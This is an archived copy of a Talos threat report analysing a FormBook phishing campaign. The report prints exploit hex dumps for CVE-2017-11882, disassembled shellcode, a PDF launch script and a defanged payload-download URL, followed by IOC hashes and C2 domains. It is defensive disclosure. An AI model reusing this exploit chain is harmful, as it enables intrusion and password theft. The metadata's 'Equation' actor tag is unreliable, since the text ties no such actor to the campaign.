{
	"id": "27ead281-8ede-44d4-a560-dab42e94d9f8",
	"created_at": "2026-04-06T00:19:55.827848Z",
	"updated_at": "2026-04-10T13:11:48.598451Z",
	"deleted_at": null,
	"sha1_hash": "7b95bf37c801604abcc64e3df3e5764f0e51f036",
	"title": "My Little FormBook",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 308809,
	"plain_text": "My Little FormBook\r\nBy Paul Rascagneres\r\nPublished: 2018-06-20 · Archived: 2026-04-05 15:18:42 UTC\r\nWednesday, June 20, 2018 11:00\r\nThis blog post is authored by Warren Mercer and Paul Rascagneres.\r\nSummary\r\nCisco Talos has been tracking a new campaign involving the FormBook malware\r\nsince May 2018 that utilizes four different malicious documents in a single\r\nphishing email. FormBook is an inexpensive stealer available as \"malware as a\r\nservice.\" This means an attacker can purchase a compiled piece of malware based\r\non their desired parameters. This is commonplace with crimeware and stealer type\r\nmalware such as FormBook. It is able to record keystrokes, steal passwords\r\n(stored locally and in web forms) and can take screenshots.\r\nThe author put a lot of effort in the infection vector using multiple malicious documents in a single phishing\r\nemail. The author also mixed different file formats (PDF and Microsoft Office document) and used two public\r\nMicrosoft Office exploits (CVE-2017-0199 and CVE-2017-11882) in order to drop the final payload on the\r\ntargeted system. The final payload was downloaded during the campaign from a small Japanese file-sharing\r\nplatform (hosted in Netherland). The platform owner has since deleted the malicious payload binaries from their\r\nsystem. Here is the infection workflow:\r\nhttps://blog.talosintelligence.com/2018/06/my-little-formbook.html\r\nPage 1 of 12\n\nWe identified an infrastructure overlap between this campaign and a previous campaign we published in February\r\n2017 relating to Pony malware which utilized Microsoft Publisher files to deliver its payload. There is the\r\npotential that the same actor behind these two attacks is the same due to an overlap in the two attacks'\r\ninfrastructure. If that is the case, the actor could switch between Pony and FormBook to be able to continue their\r\nmalicious activities for more than a year.\r\nInfection Vector\r\nPhishing Campaign\r\nThis campaign starts with a malicious email containing two attachments. Here is a snippet of the\r\nemail:\r\nhttps://blog.talosintelligence.com/2018/06/my-little-formbook.html\r\nPage 2 of 12\n\nThe email pretends to be an order sent from the sales department of a company located in Spain. The website's\r\ndetails and phone number appear to have been copied from that of a genuine company.\r\nThe email contains two attachments:\r\nA blank malicious Microsoft Office document template file. (.dotm)\r\nA malicious PDF document that is also blank. (.pdf)\r\nIf an example document from the campaign, named \"STMORDER-442799.dotm,\" is opened, it appears blank.\r\nHowever, like most Office documents, if the file is unzipped and opened, you can access the attributes and XML\r\ninformation. This is where the attacker leverages CVE-2017-0199 to trigger an external download by abusing the\r\nrelationship elements within \"STMORDER-442799\\word\\_rels\\document.xml.rels.\" Despite the file appearing to\r\nbe blank, it does contain a large amount of XML information. We see the \u003cRelationship\u003e elements being abused:\r\n\u003cRelationship Id=\"_id_2970\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\r\nThis will cause the following document to be downloaded and executed from a Japanese file-hosting platform.\r\nhttps://blog.talosintelligence.com/2018/06/my-little-formbook.html\r\nPage 3 of 12\n\nAt the time of publishing, this file is no longer available and trying to view it results in a 404 error. The platform\r\nmaintainer of PyonPyon.moe provides a list of malware that has been removed from the hosting platform — this\r\ncan be found here. Within this data, we can identify our attempted download of the .doc file, among others related\r\nto this campaign, which were removed on the same day, June 8:\r\nhttps://blog.talosintelligence.com/2018/06/my-little-formbook.html\r\nPage 4 of 12\n\nWe were able to obtain multiple .doc files in relation to this campaign, which we will discuss later on. These .doc\r\nfiles are in rich text format (RTF), which leveraged CVE-2017-11882.\r\nPDF document (Attached)\r\nAlso, attached to the initial email is a PDF file which contains a JavaScript object:\r\nthis.exportDataObject({ cName: \"mine001.dotm\", nLaunch: 2 });\r\nThis code launches a file embedded within the PDF document. In our case, the file is an Office document named\r\n\"mine001.dotm.\"\r\nSecond Office MalDoc (Embedded)\r\nThe embedded Office document is exactly the same as the attached document discussed above.\r\nhttps://blog.talosintelligence.com/2018/06/my-little-formbook.html\r\nPage 5 of 12\n\nWe don't know why the author of this campaign puts the same file in two seperate locations, or if\r\nit's on purpose or a mistake made during the phishing generation stage. It's possible the actor did\r\nnot intend to attach both the DOTM and the PDF.\r\nThird Office MalDoc (Downloaded)\r\nThe final malicious Office document is an RTF document. This RTF document contains an object\r\nlinking and embedding (OLE) stream at the offset 0x9F (header d0 cf 11 e0 a1 b1 1a e1):\r\n00000040 36 39 30 36 64 30 34 33 30 32 30 30 30 30 30 30 |6906d04302000000|\r\n00000050 31 37 30 30 30 30 30 30 37 32 34 37 35 35 33 30 |1700000072475530|\r\n00000060 33 32 37 37 34 65 37 35 36 64 37 36 33 36 34 66 |32774e756d76364f|\r\n00000070 35 30 36 66 36 32 34 62 37 34 35 38 34 37 33 32 |506f624b74584732|\r\n00000080 37 36 35 31 30 30 30 30 30 30 30 30 30 30 30 30 |7651000000000000|\r\n00000090 30 30 30 30 30 30 30 30 31 30 30 30 30 30 64 30 |00000000100000d0|\r\n000000a0 63 66 31 31 65 30 61 31 62 31 31 61 65 31 30 30 |cf11e0a1b11ae100|\r\n000000b0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|\r\n000000c0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 65 |000000000000003e|\r\n000000d0 30 30 30 33 30 30 66 65 66 66 30 39 30 30 30 36 |000300feff090006|\r\n000000e0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|\r\n000000f0 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 31 |0000000100000001|\r\n00000100 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|\r\nWe have the beginning of the OLE compound file (CF) — named OLECF — object.\r\nThis OLECF object contains a compound file binary format (CFBF) object.This file format is described here. This\r\nobject is linked to the COM object \"0002ce02–0000–0000-c000–000000000046\":\r\n00000400 52 00 6f 00 6f 00 74 00 20 00 45 00 6e 00 74 00 |R.o.o.t. .E.n.t.|\r\n00000410 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 |r.y.............|\r\n00000420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00000440 16 00 05 00 ff ff ff ff ff ff ff ff 01 00 00 00 |................|\r\n00000450 02 ce 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F|\r\n00000460 00 00 00 00 00 00 00 00 00 00 00 00 d0 e9 36 77 |..............6w|\r\n00000470 7f fc d3 01 03 00 00 00 c0 07 00 00 00 00 00 00 |................|\r\n00000480 01 00 4f 00 6c 00 65 00 31 00 30 00 4e 00 61 00 |..O.l.e.1.0.N.a.|\r\n00000490 74 00 69 00 76 00 65 00 00 00 00 00 00 00 00 00 |t.i.v.e.........|\r\n000004a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\nThis CLSID is the ID of the Equation Editor as mentioned by Microsoft. Finally, here is where and how the\r\nexploit is executed:\r\n00000800 98 07 00 00 03 d4 01 6a 72 0a 01 08 7f a9 b8 c3 |.......jr.......|\r\n00000810 42 ba ff f7 d0 8b 38 8b 37 bd c6 98 b9 ff f7 d5 |B.....8.7.......|\r\nhttps://blog.talosintelligence.com/2018/06/my-little-formbook.html\r\nPage 6 of 12\n\n00000820 8b 4d 77 56 ff d1 05 63 d6 2d 0b 2d 4d d5 2d 0b |.MwV...c.-.-M.-.|\r\n00000830 ff e0 fa d3 6e 4a c9 6a 83 53 e8 d1 41 00 1e b6 |....nJ.j.S..A...|\r\n00000840 29 1d e6 71 de 92 60 23 40 9d 40 0e 7a d8 9a d6 |)..q..`#@.@.z...|\r\n00000850 26 43 86 98 e0 c4 4e b8 1d 7d 82 46 ce 45 07 be |\u0026C....N..}.F.E..|\r\n00000860 82 15 f0 31 ec 1e 49 93 a2 d4 ef b5 da ae e8 39 |...1..I........9|\r\n00000870 ff d3 ab 65 88 29 2b 4e be b9 ec 16 e5 7f ab d6 |...e.)+N........|\r\n00000880 08 a7 ec 69 51 38 1f 97 27 27 7d f9 f3 f2 65 83 |...iQ8..''}...e.|\r\nThe red value is the stream length.\r\nThe blue value is equation editor MTEF header starting by 0x3.\r\nThe green value is the font record starting by 0x8. This vulnerability is an overflow on the front name located in\r\ngrey in the snippet above. The overflow will redirect the flow in order to execute the RET code at the address\r\n0x0041d1e8 (in pink).\r\nFinally, a shellcode is executed.\r\nHere is the first stage of the shellcode:\r\nuser@laptop:$ rasm2 -d B8C342BAFFF7D08B388B37BDC698B9FFF7D58B4D7756FFD10563D62D0B2D4DD52D0BFFE0\r\nmov eax, 0xffba42c3\r\nnot eax\r\nmov edi, dword [eax]\r\nmov esi, dword [edi]\r\nmov ebp, 0xffb998c6\r\nnot ebp\r\nmov ecx, dword [ebp + 0x77]\r\npush esi\r\ncall ecx\r\nadd eax, 0xb2dd663\r\nsub eax, 0xb2dd54d\r\njmp eax\r\nThe purpose is to execute GlobalLock() (first call) and to finally jump in the second stage of the shellcode in bold\r\norange in the hexadecimal code.\r\nThe purpose is to download and execute a binary located on a compromised WordPress website\r\n(hxxp://irishlebanese[.]com/wp-admin/images/eight/mine001.exe).\r\nFormBook is an inexpensive stealer available as \"malware as a service.\" It is able to record keystrokes, steal\r\npasswords (stored locally and in web forms) and can take screenshots. This post does not describe the malware in-depth, since there are excellent posts on the malware written by other researchers.\r\nOverlaps with previous campaigns\r\nIn February 2017, we published an article about another stealer using Publisher\r\nhttps://blog.talosintelligence.com/2018/06/my-little-formbook.html\r\nPage 7 of 12\n\nand a public exploit to compromise systems. We found three interesting samples\r\nrelated to this case and our current FormBook case:\r\n5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825 (located at\r\nhxxp://irishlebanese[.]com/wp-admin/admin/dor001.exe in May 2018)\r\n82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794 (located at\r\nhxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)\r\n8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72 (located at\r\nhxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)\r\nThese three samples use the same FormBook infrastructure and the Pony infrastructure mentioned in our previous\r\narticle:\r\nhxxp://alphastand[.]top/alien/fre.php -\u003e command and control (C2) server from 2017\r\nhxxp://ukonlinejfk[.]ru/mine/fre.php\r\nhxxp://alphastand[.]trade/alien/fre.php -\u003e C2 server from 2017\r\nhxxp://igtckeep[.]com/dor/fre.php\r\nhxxp://alphastand[.]win/alien/fre.php -\u003e C2 server from 2017\r\nhxxp://kbfvzoboss[.]bid/alien/fre.php -\u003e C2 server from 2017\r\nhxxp://www.cretezzy[.]com/do/ -\u003e FormBook C2 server\r\nhxxp://www.beemptty[.]com/se/ -\u003e FormBook C2 server\r\nThe infrastructure sharing suggests that this is a common actor currently using two different stealers. Based on the\r\ntimeline, we assume that the actor is currently moving from Pony to FormBook, another stealer.\r\nConclusion\r\nThis case shows us that malicious actors play with multiple file formats and\r\nembedded objects. In this campaign, the author used a PDF with an embedded\r\nOffice document template using a vulnerability in order to download an additional\r\nOffice RTF document, and then a second vulnerability and exploit in order to\r\ncompromise the target. The attacker used an unfamiliar file-sharing platform in\r\norder to store the malicious document and a compromised WordPress site in order\r\nto store the final payload. We did notice that the file-sharing platform is reactive,\r\nremoving the malicious files quickly, stopping the infection chain.\r\nSome technical elements, such as infrastructure sharing, show us that the actor behind this campaign is probably\r\nthe same actor behind a campaign we described one year ago. Last month it used two stealers in parallel on the\r\nsame infrastructure. Based on the information we have today, he/she no longer uses Pony, but switched to\r\nFormBook in order to steal information on compromised systems.\r\nhttps://blog.talosintelligence.com/2018/06/my-little-formbook.html\r\nPage 8 of 12\n\nCoverage\r\nAdditional ways our customers can detect and block this threat are listed below.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious\r\nwebsites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention\r\nSystem (NGIPS), andMeraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs\r\nPDF 8f859c1a9965427848315e9456237e9c018b487e3bd1d632bce2acd0c370341e\r\nEmbedded And Attached dotm\r\n04f093a3b867918dce921fe2ba40dcdae769b35dbce3047aacdb151e2208ea5c\r\nMalicious Document Hosted On The Files Sharing Platform\r\n4c16046966a5fd06c84213aa67bfa37949800980915e9b511384ec17dc7eb7b1 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/pajelx.doc\r\nhttps://blog.talosintelligence.com/2018/06/my-little-formbook.html\r\nPage 9 of 12\n\n04f093a3b867918dce921fe2ba40dcdae769b35dbce3047aacdb151e2208ea5c -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc\r\n59cf77148cbbf24d395d09192ce43ac5395087f3e499cda350e3a93f13e37de1 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/btgppc.doc\r\nD83f874dda2fa3e4339399c786e9497c1b440019fa5ee5925738fc3afa67352c -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/ejmhsu.doc\r\n35ea3d8272751d60bd3106e548444588b1959622dfdcf11be14b80786bdb25e6 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/cnlvop.doc\r\n5e9979a9676889a6656cbfa9ddc1aab2fa4b301155f5b55377a74257c9f9f583 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/hbhjks.doc\r\n0b0615eb8e4c91983fab37475ecc374f79c394768a33ea68c2208da1c03e5a43 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/zkxsam.doc\r\nFccc874f4f741231673f5a3c0bdc4c6bfd07f1b1e93f7c64e2015c393966216e -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/neitsj.doc\r\n13ce56581c8ad851fc44ad6c6789829e7c250b2c8af465c4a163b9a28c9b8a41 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/lhvazm.doc\r\n541ea322a3a6385211566f95cef333580a62341dac397e044a04504625acdd0d -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc\r\n062ae7152d8e8f3abb093e55c5a90213134dd278ac28cfeb18e81132232dcbe8 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/tewkco.doc\r\n0ddf7e87957932650679c99ff2e2380e2be8a203d1142f19a22ad602047f372e -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/lhvazm.doc\r\n1debc4e22a40f4f87142e7e40094ce1a9aa10462f0c6d1c29aa272d7d6849205 -\u003e\r\nhxxps://pomf[.]pyonpyon[.]moe/zkxsam.doc\r\nPE32 Hosted On The irishlebanese Website\r\nd7f0f3fea2f9935c1dd7bda343ec1e3fb77457e68b16b9d51516a3d8c651d14f\r\n05a945fc7a9eb4c9a4db8eb974333b3938c06d9299976075b2fc00a79cf0a129\r\n91a471ba534219f05c31d204b3c5217cde7c67f70600aa3abba334888f628376\r\nf7e97000615ee77093c4ec49f3cbe4b8cb3dc6feafc74ae8d59f01f05dc4280e\r\n23c40f55797b07b2d9bf1e314ea928b1151af2b2e605aa520a715fe56e481528\r\n1d706a3c85973fe96240a254abff52c0593b4aa0c283d3ecc28df6f8baed853b\r\ne8f0136abc46b668d44586a6b5a394b470af6af8e9d91bddca4b70e3e66768d1\r\n958ee876ebaab71ea2ef9fcda6a08598319578ccc1f4bd9baa3a54114b88abdc\r\nb031075b8ad2558ee3ee7f0749c2b24484dd6fab7252fad71548276514b9b766\r\n667cc420816fd71ae54869b4c0f05129cc5972dbc47f7a98776fc63a72d77691\r\n7db8273fd25088900cffa036eb631ffcee40302dd7b33a7d4f3e653e7ab091c0\r\n3efdc8b15e324cd9323cdbd34fbd19979d6eeb95fe1120ed3a95dc24fab67397\r\n189e2494b19773f9b72072774891378f5809c7bfb121dcba2cee13e6f91ed619\r\nhttps://blog.talosintelligence.com/2018/06/my-little-formbook.html\r\nPage 10 of 12\n\nbd44861de18d5bbf71d2d64e29ff9f1d8495f97f5ba0b49eacb504b3768a89bb\r\ne0282f51ac3bfba5774893c8b70c31600d7e4bd7f6d7231fd33315396cd18b78\r\n83fa11d8711ef22437681e09a4be500cfaf49ac7cb29837ff6a42fb46b09d789\r\n14ce215b561dc43104e400c0eb877d876f6e9be77c5b2994b9b8745b2132d914\r\n226d38382415b935d849539c0b6305a4259c26dfa7317b944f8498cd3e65850f\r\ndd1eeb128b1d1eb40e74281aec79828d7d7179a0375bda5e85ce5fd2fac064a2\r\na7422eddb437a33d730ab70bd1267d815fc3761d5eda9781de91d0bdeeb823ff\r\n2a21f728282b33b89e6cbd99db52651931b534be9837d99eacf87cfd748c3cba\r\n91b6219f4a8903773492fd83fe02e6aa8729e378f559c5cc9f115a2304f89e57\r\n4f73923c23354ac5050f012f607342362eaf1d691ce1b64ea1e831038cc4236c\r\nebbed2fcd7fe4dc8a95cc60ab9c8e98609bcf3ba5696507252c65cc6be748b14\r\nd1f9549943b936ba54d87a5befd2d241fcddac6f0caf8c786f6034ab18b8e61d\r\nae7cacc7a16cb48cb40473ad0269331c392f8eb0fef8ebe2d90f3592fccb306c\r\n00cb817330768b33a30bcf7a6a67d0269aa32f8099aee3ecd18da0e31d096610\r\ne93994bf78b13d3bdee1682faf6c6544246fbd6d95a0aa043ac175ad0b905646\r\n822c1239203db0bfdde3d0b65f50e53f7ee155638d4743b14f58267fa3e76531\r\n5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825\r\n8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72\r\n82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794\r\nC2 Servers hxxp://www[.]drylipc[.]com/em1/\r\nhxxp://www[.]handanzhize[.]info/d5/\r\nhxxp://www[.]bddxpso[.]info/d7/\r\nhxxp://www[.]newraxz[.]com/as/\r\nhxxp://www[.]atopgixn[.]info/de8/\r\nhxxp://www[.]cretezzy[.]com/am/\r\nhxxp://www[.]casiinoeuros[.]info/d3/\r\nhxxp://www[.]newraxz[.]com/as/\r\nhxxp://www[.]cretezzy[.]com/do/\r\nhxxp://www[.]newraxz[.]com/as/\r\nOverlaps Samples 5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825\r\nhxxp://alphastand[.]top/alien/fre.php\r\nhxxp://alphastand[.]trade/alien/fre.php\r\nhxxp://igtckeep[.]com/dor/fre.php\r\nhxxp://alphastand[.]win/alien/fre.php\r\nhxxp://kbfvzoboss[.]bid/alien/fre.php\r\nhxxp://www[.]cretezzy[.]com/do/\r\nhttps://blog.talosintelligence.com/2018/06/my-little-formbook.html\r\nPage 11 of 12\n\n8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72\r\nhxxp://ukonlinejfk[.]ru/mine/fre.php\r\nhxxp://alphastand[.]top/alien/fre.php\r\nhxxp://alphastand[.]trade/alien/fre.php\r\nhxxp://alphastand[.]win/alien/fre.php\r\nhxxp://kbfvzoboss[.]bid/alien/fre.php\r\nhxxp://www[.]beemptty[.]com/se/\r\n82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794 hxxp://ukonlinejfk[.]ru/mine/fre.php\r\nhxxp://alphastand[.]top/alien/fre.php\r\nhxxp://alphastand[.]trade/alien/fre.php\r\nhxxp://alphastand[.]win/alien/fre.php\r\nhxxp://kbfvzoboss[.]bid/alien/fre.php\r\nhxxp://www[.]beemptty[.]com/se/\r\nSource: https://blog.talosintelligence.com/2018/06/my-little-formbook.html\r\nhttps://blog.talosintelligence.com/2018/06/my-little-formbook.html\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2018/06/my-little-formbook.html"
	],
	"report_names": [
		"my-little-formbook.html"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434795,
	"ts_updated_at": 1775826708,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7b95bf37c801604abcc64e3df3e5764f0e51f036.pdf",
		"text": "https://archive.orkl.eu/7b95bf37c801604abcc64e3df3e5764f0e51f036.txt",
		"img": "https://archive.orkl.eu/7b95bf37c801604abcc64e3df3e5764f0e51f036.jpg"
	}
}